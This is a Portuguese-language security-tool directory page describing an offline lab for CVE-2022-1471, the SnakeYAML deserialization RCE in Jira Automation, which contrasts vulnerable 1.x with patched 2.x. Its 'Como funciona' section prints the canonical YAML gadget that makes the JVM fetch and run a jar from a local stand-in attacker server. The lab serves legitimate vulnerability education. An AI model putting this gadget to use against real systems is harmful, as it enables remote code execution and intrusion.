Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2022-1471-jira-lab — Laboratório offline CVE-2022-1471: desserialização insegura do SnakeYAML para RCE; compara a versão vulnerável 1.x com a corrigida 2.x usando um payload local inofensivo. | Kitploit
Ferramentas/GitHubGitHub/aykhan019/cve-2022-1471-jira-lab
Análise de VulnerabilidadesExploraçãoAprendizado e EducaçãoLabs e Prática
GitHubaykhan019/cve-2022-1471-jira-lab

cve-2022-1471-jira-lab

Laboratório offline CVE-2022-1471: desserialização insegura do SnakeYAML para RCE; compara a versão vulnerável 1.x com a corrigida 2.x usando um payload local inofensivo.

Ver Repositório
1há 26 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-1471 — Laboratório RCE SnakeYAML (contexto Jira / Automation for Jira)

Laboratório offline e autossuficiente que comprova o mecanismo por trás de CVE-2022-1471 (desserialização insegura do SnakeYAML → RCE, CVSS 9.8), conforme empregado na descoberta envolvendo Jira / Jira Service Management em um host executando 9.4.9 (faixa afetada 9.4.0–9.4.12, corrigida na 9.4.14 — veja o Atlassian JSDSERVER-14906).

O laboratório demonstra exatamente duas coisas:

  1. SnakeYAML 1.31 (a linha 1.x que o Jira 9.4.9 entrega no app Automation for Jira embutido) executa o gadget canônico durante o parsing de YAML — o código é executado e um arquivo marcador é gravado.
  2. SnakeYAML 2.2 (a linha que a correção 9.4.14+ entrega) recusa o mesmo payload (ConstructorException) — nada é executado.

Ele não explora nenhum host ativo. Tudo roda em 127.0.0.1; o payload (src/Exploit.java) é inofensivo — seu inicializador estático grava um único arquivo de texto e nada mais.

Execução

root@kitploit:~
./run.sh
cat PWNED-proof.txt   # on-disk proof of execution (regenerated each run)

Requer JDK 17+ no PATH (javac, java, jar). Se houver um JDK embutido em tools/, ele será usado. O único tráfego de rede é um servidor HTTP local em 127.0.0.1:8077 servindo o jar do payload, encerrado ao sair.

Como funciona

src/VulnDemo.java é um simples new Yaml().load(yaml) — a mesma chamada insegura que as versões vulneráveis do Automation for Jira fazem no YAML de regras importadas. O YAML do atacante é o gadget canônico:

root@kitploit:~
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:8077/payload.jar"]
  ]]
]

SnakeYAML 1.x instancia classes arbitrárias sem lista de permissões → a JVM busca e carrega uma classe do servidor do "atacante" → seu inicializador estático é executado. SnakeYAML 2.x usa por padrão SafeConstructor, que rejeita a tag global.

sample-output-PWNED-proof.txt mostra o conteúdo do arquivo marcador de uma execução; screenshots/ mostra ambas as execuções (vulnerável vs corrigida).

Escopo / aviso de isenção

Pesquisa de segurança autorizada. Prova apenas do mecanismo da biblioteca e do limite da correção — não é um exploit contra nenhum sistema de produção. Explorar o vetor Jira exige adicionalmente a importação autenticada (admin do Jira) de uma regra de automação.

Referências

  • NVD — CVE-2022-1471
  • Atlassian FAQ for CVE-2022-1471
  • Atlassian JSDSERVER-14906
  • SnakeYAML issue #561
Baixar ferramenta